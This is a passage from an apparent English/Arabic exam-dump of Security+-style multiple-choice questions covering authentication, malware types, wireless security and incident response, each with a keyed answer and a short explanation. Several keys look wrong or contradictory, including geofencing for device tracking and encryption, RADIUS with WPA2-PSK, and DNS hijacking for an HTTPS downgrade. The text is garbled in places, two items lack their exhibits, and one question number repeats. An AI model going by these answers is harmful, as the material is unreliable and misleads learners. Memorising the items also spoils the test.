‫ أي مما يلي سيكون أفضل علاج لمنع هذه الثغرة الأمنية؟‬.‫ويمكن إجراء فحص دينامي لثغرات التطبيق باستخدام نموذج ويب‬-78
‫تنفيذ عمليات التحقق من صحة الإدخال‬
‫ سيؤدي تنفيذ عمليات التحقق من صحة الإدخال إلى منع هجمات حقن التعليمات البرمجية عن طريق التحقق من نوع‬:‫تفسير‬
‫وتنسيق إدخال المستخدم‬
79. Which of the following roles would MOST likely have direct access to the senior management team?
A. Data custodian
B. Data owner
C. Data protection officer
D. Data controller
Answer: C
Explanation:
A data protection officer (DPO) is a role that oversees the data protection strategy and compliance of an
organization. A DPO is responsible for ensuring that the organization follows data protection laws and
regulations, such as the General Data Protection Regulation (GDPR), and protects the privacy rights of
data subjects. A DPO also acts as a liaison between the organization and data protection authorities, as
well as data subjects and other stakeholders.
‫أي من الأدوار التالية سيكون لها على الأرجح وصول مباشر إلى فريق الإدارة العليا؟‬
‫مسؤول حماية البيانات‬
‫ مسؤول حماية البيانات مسؤول عن‬.‫) هو دور يشرف على استراتيجية حماية البيانات وامتثال المؤسسة‬DPO( ‫مسؤول حماية البيانات‬
‫ وحماية حقوق الخصوصية‬، )GDPR( ‫ مثل اللائحة العامة لحماية البيانات‬، ‫ضمان اتباع المؤسسة لقوانين ولوائح حماية البيانات‬
‫ بالإضافة إلى‬، ‫ يعمل مسؤول حماية البيانات أيضا كحلقة وصل بين المنظمة وسلطات حماية البيانات‬.‫لموضوعات البيانات‬
.‫موضوعات البيانات وأصحاب المصلحة الآخرين‬
43 / 198
The safer , easier way to help you pass any IT exams.
80.A security analyst is investigating multiple hosts that are communicating to external IP addresses
during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus
software.
Which of the following types of malware is MOST likely infecting the hosts?
A. A RAT
B. Ransomware
C. Polymophic
D. A worm
Answer: A
Explanation:
Based on the given information, the most likely type of malware infecting the hosts is a RAT (Remote
Access Trojan). RATs are often used for stealthy unauthorized access to a victim's computer, and they
can evade traditional antivirus software through various sophisticated techniques. In particular, the fact
that the malware is communicating with external IP addresses during specific hours suggests that it may
be under the control of an attacker who is issuing commands from a remote location. Ransomware,
polymorphic malware, and worms are also possible culprits, but the context of the question suggests that
a RAT is the most likely answer.
4:00 - ‫ صباحا‬2:00 ‫ خارجية خلال ساعات‬IP ‫ يقوم محلل أمني بالتحقيق في العديد من المضيفين الذين يتواصلون مع عناوين‬-80
‫ أي من الأنواع التالية من البرامج الضارة من‬.‫ تهربت البرامج الضارة من الكشف بواسطة برامج مكافحة الفيروسات التقليدية‬.‫صباحا‬
‫المرجح أن تصيب المضيفين؟ اي الف تي‬
‫ (حصان طروادة للوصول‬RAT ‫ فإن النوع الأكثر احتمالا من البرامج الضارة التي تصيب المضيفين هو‬، ‫بناء على المعلومات المقدمة‬
.)‫عن بعد‬
81.A security analyst reviews a company’s authentication logs and notices multiple authentication
failures. The authentication failures are from different usernames that share the same source IP address.
Which of the password attacks is MOST likely happening?
A. Dictionary
B. Rainbow table
C. Spraying
D. Brute-force
Answer: C
Explanation:
Password spraying is an attack where an attacker tries a small number of commonly used passwords
against a large number of usernames. The goal of password spraying is to avoid detection by avoiding
too many failed login attempts for any one user account. The fact that different usernames are being
attacked from the same IP address is a strong indication that a password spraying attack is underway.
‫ حالات فشل المصادقة من‬.‫ويستعرض محلل أمني سجلات مصادقة الشركة ويلاحظ حالات فشل متعددة في الاستيقان‬-81
‫ أي من هجمات كلمة المرور تحدث على الأرجح؟ سبرينق‬.‫ المصدر‬IP ‫أسماء مستخدمين مختلفة تشترك في نفس عنوان‬
‫شرح \ رش كلمة المرور هو هجوم يحاول فيه المهاجم عددا صغيرا من كلمات المرور شائعة الاستخدام ضد عدد كبير من‬
.‫أسماء المستخدمين‬
44 / 198
The safer , easier way to help you pass any IT exams.
82.A security assessment found that several embedded systems are running unsecure protocols. These
Systems were purchased two years ago and the company that developed them is no longer in business.
Which of the following constraints BEST describes the reason the findings cannot be remediated?
A. inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch
Answer: D
Explanation:
If the systems are running unsecure protocols and the company that developed them is no longer in
business, it is likely that there are no patches available to remediate the issue.
‫ تم شراء هذه الأنظمة قبل عامين ولم تعد الشركة التي‬.‫وخلص تقييم أمني إلى أن عدة نظم مدمجة تستخدم بروتوكولات غير آمنة‬-82
‫ أي من القيود التالية يصف بشكل أفضل سبب عدم إمكانية معالجة النتائج؟ تصحيح غير متوفر‬.‫طورتها تعمل في مجال الأعمال‬
‫ فمن المحتمل أنه لا توجد تصحيحات متاحة‬، ‫ إذا كانت الأنظمة تعمل ببروتوكولات غير آمنة ولم تعد الشركة التي طورتها تعمل‬:‫تفسير‬
.‫لمعالجة المشكلة‬
83. An employee's company account was used in a data breach Interviews with the employee revealed:
• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any
other countries.
Which of the following can be implemented to prevent these issues from reoccuring? (Select TWO)
A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing
Answer: C,F
Explanation:
two possible solutions that can be implemented to prevent these issues from reoccurring are password
history and geofencing12. Password history is a feature that prevents users from reusing their
previous passwords1. This can enhance password security by forcing users to create new and unique
passwords periodically1. Password history can be configured by setting a policy that specifies how
many previous passwords are remembered and how often users must change their passwords1.
Geofencing is a feature that restricts access to a system or network based on the geographic location of
the user or device2. This can enhance security by preventing unauthorized access from hostile or foreign
regions2. Geofencing can be implemented by using GPS, IP address, or other methods to
determine thelocation of the user or device and compare it with a predefined set of boundaries2.
‫ تمكن الموظف من تجنب تغيير كلمات المرور باستخدام كلمة‬:‫تم استخدام حساب شركة الموظف في خرق البيانات كشفت المقابلات مع الموظف‬
‫ أي مما يلي يمكن تنفيذه‬.‫ لكن الموظف لم يسافر أبدا إلى أي دولة أخرى‬، ‫ تم الوصول إلى الحساب من دولة أجنبية معادية‬.‫مرور سابقة مرة أخرى‬
‫ السياج الجغرافي‬, ‫ سجل كلمات المرور‬.)‫لمنع تكرار هذه المشكلات؟ (اختر اثنين‬
1‫سجل كلمات المرور هو ميزة تمنع المستخدمين من إعادة استخدام كلمات المرور السابقة‬
‫ أو طرق أخرى لتحديد موقع المستخدم‬IP ‫) أو عنوان‬GPS( ‫يمكن تنفيذ السياج الجغرافي باستخدام نظام تحديد المواقع العالمي‬
.2‫أو الجهاز ومقارنته بمجموعة محددة مسبقا من الحدود‬
45 / 198
The safer , easier way to help you pass any IT exams.
84. Which of the following provides a catalog of security and privacy controls related to the United States
federal information systems?
A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53
Answer: D
Explanation
NIST 800-53 provides a catalog of security and privacy controls related to the United States
federalinformation systems. : Architecture and Design, pp. 123-125
‫أي مما يلي يوفر كتالوجا لعناصر التحكم في الأمان والخصوصية المتعلقة بأنظمة المعلومات الفيدرالية للولايات المتحدة؟‬
85.A security analyst is responding to an alert from the SIEM. The alert states that malware was
discovered on a host and was not automatically deleted.
Which of the following would be BEST for the analyst to perform?
A. Add a deny-all rule to that host in the network ACL
B. Implement a network-wide scan for other instances of the malware.
C. Quarantine the host from other parts of the network
D. Revoke the client's network access certificates
Answer: C
Explanation:
When malware is discovered on a host, the best course of action is to quarantine the host
from otherparts of the network. This prevents the malware from spreading and potentially
infecting other hosts.Adding a deny-all rule to the host in the network ACL may prevent legitimate
traffic from being processed, implementing a network-wide scan is time-consuming and may not be
necessary, and revoking the client's network access certificates is an extreme measure that may not
be warranted.
‫يستجيب محلل أمني لتنبيه من التنبيه ينص على اكتشاف برامج ضارة على مضيف ولم يتم حذفها تلقائيًا‬
‫أي مما يلي سيكون أفضل أداء للمحلل ؟ عزل المضيف من أجزاء أخرى من الشبكة‬
‫ فإن أفضل إجراء هو عزل المضيف عن أجزاء أخرى من الشبكة‬، ‫شرح \ عندما يتم اكتشاف برامج ضارة على مضيف‬
86.A security analyst wants to verify that a client-server (non-web) application is sending encrypted
traffic. Which of the following should the analyst use?
A. openssl
B. hping
C. netcat
D. tcpdump
Answer: A
Explanation:
To verify that a client-server (non-web) application is sending encrypted traffic, a security analyst can use
OpenSSL. OpenSSL is a software library that provides cryptographic functions, including encryption and
decryption, in support of various security protocols, including SSL/TLS. It can be used to check whether
a client-server application is using encryption to protect traffic.
‫ أي مما يلي يجب أن يستخدمه‬.‫يريد محلل أمني التحقق من أن تطبيق خادم عميل (غير ويب) يرسل حركة مرور مشفرة‬.86
‫المحلل؟ اوبن سلل‬
‫ يمكن لمحلل الأمان استخدام اوبن سلل‬، ‫للتحقق من أن تطبيق خادم العميل (غير الويب) يرسل حركة مرور مشفرة‬
46 / 198
The safer , easier way to help you pass any IT exams.
87. Which of the following involves the inclusion of code in the main codebase as soon as it is written?
A. Continuous monitoring
B. Continuous deployment
C. Continuous Validation
D. Continuous integration
Answer: D
Explanation:
Continuous Integration (CI) is a practice where developers integrate code into a shared
repository frequently,
‫يتضمن ما يلي تضمين الكود في قاعدة التعليمات البرمجية الرئيسية بمجرد كتابته؟ التكامل المستمر‬
‫) هو ممارسة يقوم فيها المطورون بدمج التعليمات البرمجية في مستودع مشترك بشكل متكرر‬CI( ‫التكامل المستمر‬
88.A company would like to set up a secure way to transfer data between users via their mobile phones
The company's top pnonty is utilizing technology that requires users to be in as close proximity as
possible to each other. Which of the following connection methods would BEST fulfill this need?
A. Cellular
B. NFC
C. Wi-Fi
D. Bluetooth
Answer: B
Explanation:
NFC allows two devices to communicate with each other when they are in close proximity to each other,
typically within 5 centimetres. This makes it the most secure connection method for the company's data
transfer requirements.
‫ترغب إحدى الشركات في إنشاء طر يقة آمنة لنقل البيانات بين المستخدمين عبر هواتفهم المحمولة تستخدم الشركة الأعلى في الشركة‬-88
‫ أي من طرق الاتصال التالية ستلبي هذه الحاجة‬.‫التكنولوجيا التي تتطلب من المستخدمين أن يكونوا على مقربة قدر الإمكان من بعضهم البعض‬
‫بشكل أفضل؟ نفك‬
‫ هذا يجعلها طريقة الاتصال‬.‫ سم‬5 ‫ عادة في حدود‬، ‫ لجهازين بالاتصال ببعضهما البعض عندما يكونان على مقربة من بعضهما البعض‬NFC ‫يسمح‬
.‫الأكثر أمانا لمتطلبات نقل البيانات الخاصة بالشركة‬
89. An organization wants to integrate its incident response processes into a workflow with automated
decision points and actions based on predefined playbooks.
Which of the following should the organization implement?
A. SIEM
B. SOAR
C. EDR
D. CASB
Answer: B
Explanation:
Security Orchestration, Automation, and Response (SOAR) should be implemented to integrate incident
response processes into a workflow with automated decision points and actions based on predefined
playbooks.
‫ترغب إحدى المؤسسات في دمج عمليات االستجابة للحوادث في سير العمل باستخدام نقاط اتخاذ القرار واإلجراءات المؤتمتة استنادًا إلى كتيبات اللعب المحددة‬
‫مسبقًا أي مما يلي يجب على المنظمة تنفيذه؟ سوار‬
‫) لدمج عمليات الاستجابة للحوادث في سير العمل مع نقاط القرار والإجراءات‬SOAR( ‫يجب تنفيذ التنسيق الأمني والأتمتة والاستجابة‬
.‫الآلية بناء على أدلة التشغيل المحددة مسبقا‬
47 / 198
The safer , easier way to help you pass any IT exams.
90.A security researcher has alerted an organization that its sensitive user data was found for sale on a
website. Which of the following should the organization use to inform the affected parties?
A. An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: B
Explanation:
A communications plan should be used to inform the affected parties about the sale of sensitive user
data on a website. The communications plan should detail how the organization will handle media
inquiries, how to communicate with customers, and how to respond to other interested parties.
‫نبه باحث أمني إحدى المؤسسات إلى أنه تم العثور على بيانات المستخدم الحساسة الخاصة بها للبيع على أحد مواقع الويب أي مما يلي يجب أن تستخدمه‬
‫المنظمة إلبالغ األطراف المتضررة ؟ خطة االتصاالت‬
‫يجب استخدام خطة اتصاالت إلبالغ األطراف المتأثرة ببيع بيانات المستخدم الحساسة على موقع ويب يجب أن توضح خطة االتصاالت بالتفصيل كيف‬
‫ وكيفية الرد على األطراف المهتمة األخرى‬، ‫ وكيفية التواصل مع العمالء‬، ‫ستتعامل المنظمة مع االستفسارات اإلعالمية‬
91. The spread of misinformation surrounding the outbreak of a novel virus on election day led to eligible
voters choosing not to take the risk of going the polls.
This is an example of:
A. prepending.
B. an influence campaign.
C. a watering-hole attack.
D. intimidation.
E. information elicitation.
Answer: B
Explanation:
This scenario describes an influence campaign, where false information is spread to influence or
manipulate people's beliefs or actions.
‫أدى انتشار المعلومات الخاطئة المحيطة بتفشي فيروس جديد في يوم الانتخابات إلى اختيار الناخبين المؤهلين عدم المخاطرة‬
.‫ حملة تأثير‬:‫ هذا مثال على‬.‫بالذهاب إلى صناديق الاقتراع‬
.‫ حيث يتم نشر معلومات خاطئة للتأثير على معتقدات الناس أو أفعالهم أو التلاعب بها‬، ‫شرح \ يصف هذا السيناريو حملة تأثير‬
91. Which of the following authentication methods is considered to be the LEAST secure?
A. TOTP
B. SMS
C. HOTP
D. Token key
Answer: B
Explanation:
SMS-based authentication is considered to be the least secure among the given options.
‫أي من طرق المصادقة التالية تعتبر الأقل أمانا؟ اس ام اس‬
‫ تعتبر المصادقة المستندة إلى الرسائل القصيرة هي الأقل أمانا بين الخيارات المحددة‬:‫التفسير‬
48 / 198
The safer , easier way to help you pass any IT exams.
93.A backdoor was detected on the containerized application environment. The investigation detected
that a zero-day vulnerability was introduced when the latest container image version was downloaded
from a public registry.
Which of the following is the BEST solution to prevent this type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers
C. Define a vulnerability scan to assess container images before being introduced on the environment
D. Create a dedicated VPC for the containerized environment
Answer: A
Explanation:
Enforcing the use of a controlled trusted source of container images is the best solution to prevent
incidents like the introduction of a zero-day vulnerability through container images from occurring again.
‫ اكتشف التحقيق أنه تم تقديم ثغرة أمنية في يوم الصفر عندما تم‬.‫واكتشف باب خلفي في بيئة التطبيق الموضوعة في حاويات‬‫ أي مما يلي هو أفضل حل لمنع حدوث هذا النوع من الحوادث مرة أخرى؟‬.‫تنزيل أحدث إصدار من صورة الحاوية من سجل عام‬
‫فرض استخدام مصدر موثوق به خاضع للرقابة لصور الحاوية‬
‫ يعد فرض استخدام مصدر موثوق به خاضع للرقابة لصور الحاوية هو الحل الأفضل لمنع وقوع حوادث مثل إدخال ثغرة يوم‬:‫تفسير‬
.‫الصفر من خلال صور الحاوية مرة أخرى‬
94.During a Chief Information Security Officer (CISO) convention to discuss security awareness, the
attendees are provided with a network connection to use as a resource. As the convention progresses,
one of the attendees starts to notice delays in the connection, and the HIIPS site requests are reverting
to HTTP.
Which of the following BEST describes what is happening?
A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. ASSLILS downgrade
Answer: B
Explanation:
The attendee is experiencing delays in the connection , and the HIIPS site requests are reverting to
HTTP, indicating that the DNS resolution is redirecting the connection to another server. DNS
hijacking is a technique that involves redirecting a user’s requests for a domain name to a different IP
address.
Attackers use DNS hijacking to redirect users to malicious websites and steal sensitive information, such
as login credentials and credit card details.
.‫ يتم تزويد الحاضرين باتصال شبكة لاستخدامه كمورد‬،‫وخلال مؤتمر لكبير موظفي أمن المعلومات لمناقشة الوعي الأمني‬-94
‫ أي مما يلي‬.HTTP ‫ إلى‬HIIPS ‫ وتعود طلبات موقع‬، ‫ يبدأ أحد الحاضرين في ملاحظة التأخير في الاتصال‬، ‫مع تقدم المؤتمر‬
.‫ لإعادة توجيه حركة المرور‬DNS ‫يصف ما يحدث؟ اختطاف‬
:‫تفسير‬
‫ يعيد توجيه‬DNS ‫ مما يشير إلى أن تحليل‬، HTTP ‫ إلى‬HIIPS ‫ وتعود طلبات موقع‬، ‫يواجه الحضور تأخيرات في الاتصال‬
‫الاتصال إلى خادم آخر‬
49 / 198
The safer , easier way to help you pass any IT exams.
95.A security analyst notices several attacks are being blocked by the NIPS but does not see anything
on the boundary firewall logs. The attack seems to have been thwarted.
Which of the following resiliency techniques was applied to the network to prevent this attack?
A. NIC Teaming
B. Port mirroring
C. Defense in depth
D. High availability
E. Geographic dispersal
Answer: C
Explanation:
Defense in depth is a resiliency technique that involves implementing multiple layers of security controls
to protect against different types of threats. In this scenario, the NIPS likely provided protection at a
different layer than the boundary firewall, demonstrating the effectiveness of defense in depth.
‫ ويبدو‬.‫ ولكنه لا يرى أي شيء في سجلات جدار الحماية الحدودي‬NIPS ‫لاحظ محلل أمني أن العديد من الهجمات قد حظرها‬-95
‫ أي من تقنيات المرونة التالية تم تطبيقها على الشبكة لمنع هذا الهجوم؟ الدفاع في العمق‬.‫أن الهجوم قد أحبط‬
‫ الدفاع في العمق هو تقنية مرونة تتضمن تنفيذ طبقات متعددة من الضوابط الأمنية للحماية من أنواع مختلفة من‬:‫تفسير‬
‫ مما يدل‬، ‫ الحماية في طبقة مختلفة عن جدار الحماية الحدودي‬NIPS ‫ من المحتمل أن يوفر‬، ‫ في هذا السيناريو‬.‫التهديدات‬
.‫على فعالية الدفاع في العمق‬
96. During a forensic investigation, a security analyst discovered that the following command was run on
a compromised host:
Which of the following attacks occurred?
A. Buffer overflow
B. Pass the hash
C. SQL injection
D. Replay attack
Answer: B
Explanation:
Pass the hash is an attack technique that allows an attacker to authenticate to a remote server or service
by using the hashed version of a user’s password, rather than requiring the plaintext password.
:‫ اكتشف محلل أمني أن الأمر التالي تم تشغيله على مضيف مخترق‬، ‫أثناء تحقيق الطب الشرعي‬
‫أي الهجمات الآتية وقعت؟ تمرير التجزئة‬
‫ تمرير التجزئة هو أسلوب هجوم يسمح للمهاجم بالمصادقة على خادم أو خدمة بعيدة باستخدام الإصدار المجزأ من‬:‫تفسير‬
.‫ بدلا من طلب كلمة مرور النص العادي‬، ‫كلمة مرور المستخدم‬
50 / 198
The safer , easier way to help you pass any IT exams.
97.A security analyst has been tasked with creating a new WiFi network for the company.
The requirements received by the analyst are as follows:
• Must be able to differentiate between users connected to WiFi
• The encryption keys need to change routinely without interrupting the users or forcing reauthentication
• Must be able to integrate with RADIUS
• Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?
A. WPA2-Enterprise
B. WPA3-PSK
C. 802.11n
D. WPS
Answer: A
‫ يجب أن يكون قادرا على التمييز بين‬:‫ المتطلبات التي يتلقاها المحلل هي كما يلي‬.‫ وكلف محلل أمني بإنشاء شبكة واي فاي جديدة للشركة‬-97
‫ يجب تغيير مفاتيح التشفير بشكل روتيني دون مقاطعة المستخدمين أو فرض إعادة المصادقة يجب أن تكون‬WiFi ‫المستخدمين المتصلين بشبكة‬
‫ يستوعب هذه المتطلبات؟‬BEST ‫ مفتوحة أي من الخيارات التالية‬SSID ‫ يجب ألا يكون لديك أي معرفات‬RADIUS ‫قادرا على الاندماج مع‬
98. Which of the following environments utilizes dummy data and is MOST likely to be installed locally
on a system that allows code to be assessed directly and modified easily with each build?
A. Production
B. Test
C. Staging
D. Development
Answer: D
Explanation:
A development environment is the environment that is used to develop and test software. It is typically
installed locally on a system that allows code to be assessed directly and modified easily with each
build.In this environment, dummy data is often utilized to test the software's functionality.
‫أي من البيئات التالية تستخدم بيانات وهمية ومن المرجح أن يتم تثبيتها محليا على نظام يسمح بتقييم التعليمات البرمجية مباشرة وتعديلها بسهولة‬
‫مع كل بناء؟ تطور‬
99. Per company security policy, IT staff members are required to have separate credentials to perform
administrative functions using just-in-time permissions.
Which of the following solutions is the company Implementing?
A. Privileged access management
B. SSO
C. RADIUS
D. Attribute-based access control
Answer: A
Explanation:
The company is implementing privileged access management , which provides just-in-time
permissions for administrative functions.
‫ يتعين على موظفي تكنولوجيا المعلومات الحصول على بيانات اعتماد منفصلة لأداء الوظائف‬، ‫وفقا لسياسة أمان الشركة‬
‫ أي من الحلول التالية تنفذها الشركة؟ إدارة الوصول المميز‬.‫الإدارية باستخدام أذونات في الوقت المناسب‬
.‫ والتي توفر أذونات في الوقت المناسب للوظائف الإدارية‬، ‫ تقوم الشركة بتنفيذ إدارة الوصول المميز‬:‫تفسير‬
51 / 198
The safer , easier way to help you pass any IT exams.
100.A company is concerned about individuals dnvmg a car into the building to gam access.
Which of the following security controls would work BEST to prevent this from happening?
A. Bollard
B. Camera
C. Alarms
D. Signage
E. Access control vestibule
Answer: A
Explanation:
A bollard would work best to prevent individuals from driving a car into the building. A bollard is a
short, vertical post that can be used to block vehicles from entering a designated area. It is specifically
designed to stop cars from crashing into buildings or other structures.
‫ أي من عناصر التحكم الأمنية التالية ستعمل بشكل‬.‫ تشعر شركة بالقلق إزاء الأفراد الذين يقومون بإدخال سيارة إلى المبنى للوصول إلى الألعاب‬-10
‫أفضل لمنع حدوث ذلك؟ بولارد‬
101.A security analyst must enforce policies to harden an MDM infrastructure.
The requirements are as follows:
* Ensure mobile devices can be tracked and wiped.
* Confirm mobile devices are encrypted.
Which of the following should the analyst enable on all the devices to meet these requirements?
A. A Geofencing
B. Biometric authentication
C. Geolocation
D. Geotagging
Answer: A
Explanation:
Geofencing is a technology used in mobile device management (MDM) to allow administrators to
definegeographical boundaries within which mobile devices can operate.
:‫ المتطلبات هي كما يلي‬.MDM ‫يجب على محلل الأمن فرض سياسات لتقوية البنية التحتية ل‬.101
.‫تأكد من إمكانية تتبع الأجهزة المحمولة ومسحها‬
.‫تأكد من تشفير الأجهزة المحمولة‬
.‫أي مما يلي يجب على المحلل تمكينه على جميع الأجهزة لتلبية هذه المتطلبات؟ سياج جغرافي‬
‫) للسماح للمسؤولين بتحديد الحدود الجغرافية التي يمكن‬MDM( ‫ هي تقنية تستخدم في إدارة الأجهزة المحمولة‬Geofencing
.‫للأجهزة المحمولة العمل ضمنها‬
52 / 198
The safer , easier way to help you pass any IT exams.
102.CORRECT TEXT
After a hardware incident, an unplanned emergency maintenance activity was conducted to rectify the
issue. Multiple alerts were generated on the SIEM during this period of time.
Which of the following BEST explains what happened?
A. The unexpected traffic correlated against multiple rules, generating multiple alerts.
B. Multiple alerts were generated due to an attack occurring at the same time.
C. An error in the correlation rules triggered multiple alerts.
D. The SIEM was unable to correlate the rules, triggering the alerts.
Answer: A
‫ تم إنشاء تنبيهات متعددة على‬.‫ تم إجراء نشاط صيانة طارئ غير مخطط له لتصحيح المشكلة‬، ‫بعد وقوع حادث في الأجهزة‬
‫ مما أدى إلى‬، ‫ أي مما يلي يفسر ما حدث؟ ارتبطت حركة المرور غير المتوقعة بقواعد متعددة‬.‫ خلال هذه الفترة الزمنية‬SIEM
.‫إنشاء تنبيهات متعددة‬
103.A company has discovered unauthorized devices are using its WiFi network, and it wants to harden
the access point to improve security.
Which of the following configuration should an analysis enable To improve security? (Select TWO.)
A. RADIUS
B. PEAP
C. WPS
D. WEP-EKIP
E. SSL
F. WPA2-PSK
Answer: A,F
Explanation:
To improve the security of the WiFi network and prevent unauthorized devices from accessing
the network, the configuration options of RADIUS and WPA2-PSK should be enabled.
‫ أي من‬.‫ وتريد تقوية نقطة الوصول لتحسين الأمان‬، ‫اكتشفت شركة أن الأجهزة غير المصرح بها تستخدم شبكة الخاصة بها‬
‫التكوين التالي يجب أن يمكن التحليل لتحسين الأمان؟‬
53 / 198
The safer , easier way to help you pass any IT exams.
104.A company recently decided to allow its employees to use their personally owned devices
for tasks like checking email and messaging via mobile applications. The company would like to use
MDM, but employees are concerned about the loss of personal data.
Which of the following should the IT department implement to BEST protect the company against
company data loss while still addressing the employees’ concerns?
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.
B. Configure the MDM software to enforce the use of PINs to access the phone.
C. Configure MDM for FDE without enabling the lock screen.
D. Perform a factory reset on the phone before installing the company's applications.
Answer: C
Explanation:
FDE can protect data from unauthorized access in case the device is lost or stolen.
‫قررت شركة مؤخرا السماح لموظفيها باستخدام أجهزتهم الشخصية لمهام مثل التحقق من البريد الإلكتروني والمراسلة عبر تطبيقات الهاتف‬-104
‫ أي مما يلي يجب على قسم تكنولوجيا‬.‫ لكن الموظفين قلقون بشأن فقدان البيانات الشخصية‬، MDM ‫ ترغب الشركة في استخدام‬.‫المحمول‬
FDE ‫ ل‬MDM ‫المعلومات تنفيذه لحماية الشركة بشكل أفضل من فقدان بيانات الشركة مع الاستمرار في معالجة مخاوف الموظفين؟ قم بتكوين‬
.‫دون تمكين شاشة القفل‬
.‫ حماية البيانات من الوصول غير المصرح به في حالة فقد الجهاز أو سرقته‬FDE ‫شرح \ يمكن ل‬
105.A security researcher is using an adversary's infrastructure and TTPs and creating a named group to
track those targeted.
Which of the following is the researcher MOST likely using?
A. The Cyber Kill Chain
B. The incident response process
C. The Diamond Model of Intrusion Analysis
D. MITRE ATT&CK
Answer: D
Explanation:
The researcher is most likely using the MITRE ATT&CK framework. MITRE ATT&CK is a globally
accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world
observations.
‫ أي مما يلي يستخدمه الباحث‬.‫ويستخدم باحث أمني البنية التحتية للخصم ونقاط ترجمة البيانات وينشئ مجموعة محددة لتعقب المستهدفين‬-105
‫على الأرجح؟ ميتري اتتاك‬
‫ هي قاعدة معرفية يمكن الوصول إليها عالميا لتكتيكات وتقنيات‬CK&ATT MITRE .CK& ATT MITRE ‫يستخدم الباحث على الأرجح إطار عمل‬
.‫وإجراءات الخصم بناء على ملاحظات العالم الحقيقي‬
106. Which of the following is a physical security control that ensures only the authorized user is present
when gaining access to a secured area?
A. A biometric scanner
B. A smart card reader
C. APKItoken
D. A PIN pad
Answer: A
Explanation:
A biometric scanner uses physical characteristics such as fingerprints to identify an individual user. It is
used to ensure that only the authorized user is present when gaining access to a secured area.
‫أي مما يلي يمثل عنصر تحكم أمني مادي يضمن وجود المستخدم المصرح له فقط عند الوصول إلى منطقة آمنة؟‬
‫سكان بيومترك‬
‫ يتم استخدامه لضمان‬.‫ يستخدم الماسح الضوئي البيومتري الخصائص الفيزيائية مثل بصمات الأصابع لتحديد هوية المستخدم الفردي‬:‫تفسير‬
.‫وجود المستخدم المصرح له فقط عند الوصول إلى منطقة آمنة‬
54 / 198
The safer , easier way to help you pass any IT exams.
107. An organization is moving away from the use of client-side and server-side certificates for EAR The
company would like for the new EAP solution to have the ability to detect rogue access points.
Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
Answer: B
Explanation:
. EAP-FAST includes a mechanism for detecting rogue access points.
‫ الجديد القدرة على‬EAP ‫ ترغب الشركة في أن يكون لدى حل‬EAR ‫تبتعد المؤسسة عن استخدام الشهادات من جانب العميل ومن جانب الخادم ل‬
‫ أي مما يلي يحقق هذه المتطلبات؟ ايب فاست‬.‫اكتشاف نقاط الوصول المارقة‬
.‫ آلية لاكتشاف نقاط الوصول المارقة‬FAST-EAP \‫شرح‬
108.A network analyst is investigating compromised corporate information. The analyst leads to a theory
that network traffic was intercepted before being transmitted to the internet.
The following output was captured on an internal host:
Based on the IoCS, which of the following was the MOST likely attack used to compromise the network
communication?
A. Denial of service
B. ARP poisoning
C. Command injection
D. MAC flooding
Answer: B
Explanation:
ARP poisoning (also known as ARP spoofing) is a type of attack where an attacker sends falsified ARP
messages over a local area network to link the attacker's MAC address with the IP address of another
host on the network.
‫ يؤدي المحلل إلى نظرية مفادها أنه تم اعتراض حركة مرور‬.‫ويقوم محلل شبكي بالتحقيق في معلومات الشركة المخترقة‬-108
:‫ تم التقاط الإخراج التالي على مضيف داخلي‬.‫الشبكة قبل نقلها إلى الإنترنت‬
‫ أي مما يلي كان الهجوم الأكثر احتمالا المستخدم لاختراق اتصال الشبكة؟ تسمم الف ار بي‬، IoCS ‫استنادا إلى‬
55 / 198
The safer , easier way to help you pass any IT exams.
109.A retail company that is launching @ new website to showcase the company’s product line and
other information for online shoppers registered the following URLs:
* www companysite com
* shop companysite com
* about-us companysite com contact-us. companysite com secure-logon company site com
Which of the following should the company use to secure its website if the company is concerned with
convenience and cost?
A. A self-signed certificate
B. A root certificate
C. A code-signing certificate
D. A wildcard certificate
E. An extended validation certificate
Answer: D
Explanation:
The company can use a wildcard certificate to secure its website if it is concerned with convenience and
cost. A wildcard certificate can secure multiple subdomains, which makes it cost-effective and convenient
for securing the various registered domains.
‫ قامت شركة بيع بالتجزئة تطلق موقعا إلكترونيا جديدا لعرض خط إنتاج الشركة ومعلومات أخرى للمتسوقين عبر الإنترنت بتسجيل عناوين‬-109
‫ تسجيل الدخول الآمن موقع الشركة‬.‫شركةموقع كوم اتصل بنا‬-‫ شبكة الاتصالات العالمية موقع الشركة كوم متجر الشركةموقع كوم من نحن‬:‫التالية‬
‫كوم أي مما يلي يجب أن تستخدمه الشركة لتأمين موقعها الإلكتروني إذا كانت الشركة معنية بالراحة والتكلفة؟ شهادة ويلد كارد‬
‫ يمكن لشهادة حرف البدل تأمين نطاقات‬.‫يمكن للشركة استخدام شهادة حرف بدل لتأمين موقعها على الويب إذا كانت معنية بالراحة والتكلفة‬
.‫ مما يجعلها فعالة من حيث التكلفة ومريحة لتأمين مختلف المجالات المسجلة‬، ‫فرعية متعددة‬
110.A bad actor tries to persuade someone to provide financial information over the phone in order to
gain access to funds.
Which of the following types of attacks does this scenario describe?
A. Vishing
B. Phishing
C. Spear phishing
D. Whaling
Answer: A
Explanation:
Vishing is a social engineering attack that uses phone calls or voicemail messages to trick people
into divulging sensitive information, such as financial information or login credentials.
‫ أي من أنواع الهجمات التالية يصفها هذا‬.‫يحاول ممثل سيئ إقناع شخص ما بتقديم معلومات مالية عبر الهاتف من أجل الوصول إلى الأموال‬-110
‫السيناريو؟‬
‫ مثل‬، ‫ هو هجوم هندسة اجتماعية يستخدم المكالمات الهاتفية أو رسائل البريد الصوتي لخداع الأشخاص للكشف عن معلومات حساسة‬Vishing
.‫المعلومات المالية أو بيانات اعتماد تسجيل الدخول‬
56 / 198
The safer , easier way to help you pass any IT exams.
